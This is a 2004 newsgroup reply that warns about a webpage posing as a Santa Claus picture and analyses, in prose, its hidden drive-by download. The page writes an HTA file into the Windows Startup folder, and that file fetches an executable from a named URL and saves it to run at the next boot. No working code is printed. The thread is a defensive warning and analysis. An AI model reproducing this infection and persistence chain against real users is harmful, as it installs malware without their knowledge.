On 2004-12-30, Dr. J <nobody@[EMAIL PROTECTED]
> wrote:
> Folks, in its regular scan of my computer, my anti virus program
detected
> virus "bloodhound.exploit.21" on this webpage. Do yourself a favor and
run
> your anti virus program if you visited this site.
>
> Shame on you paddy
>
>
><joshz@[EMAIL PROTECTED]
> wrote in message
news:i4yAd.609046$nl.394505@[EMAIL PROTECTED]
>> Santa Clause like you have never seen him before, this is a must see
for
> everyone http://paddy.home.comcast.net/
I believe that bloodhound.exploit.21 is a fairly generic term for an
attempt
to load something without your knowledge. Hopefully it caught the hta
file in your startup group (before it ran and downloaded the xp.exe file)
When it was up ...
There is nothing much here. Just a picture. Then 214 blank lines.
Then ... an [object] tag running:
Javascript to write out an inclusion (do***ent.write)
of the vbscript file http://paddy.home.comcast.net/writehta.txt
Once that is included on the page, it creates a file with text
(vbscript). That file is an ADODB.Recordset (filled with the vbscript
commands to get the file http://paddy.home.comcast.net/xp.exe
and
save it to
C:\Do***ents and Settings\All Users\Start
Menu\Programs\Startup\OfficeOSA.exe)
The ADOBB.Recordset (with the commands to get xp.exe) is then written
out
to C:\Do***ents and Settings\All Users\Start
Menu\Programs\Startup\MicrosoftOffice.hta
So it looks like on the next boot, the MicrosoftOffice.hta
is run to get the xp.exe file and save to OfficeOSA.exe and on
the next boot, that is run (being in the startup group)
Bad paddy ...
|
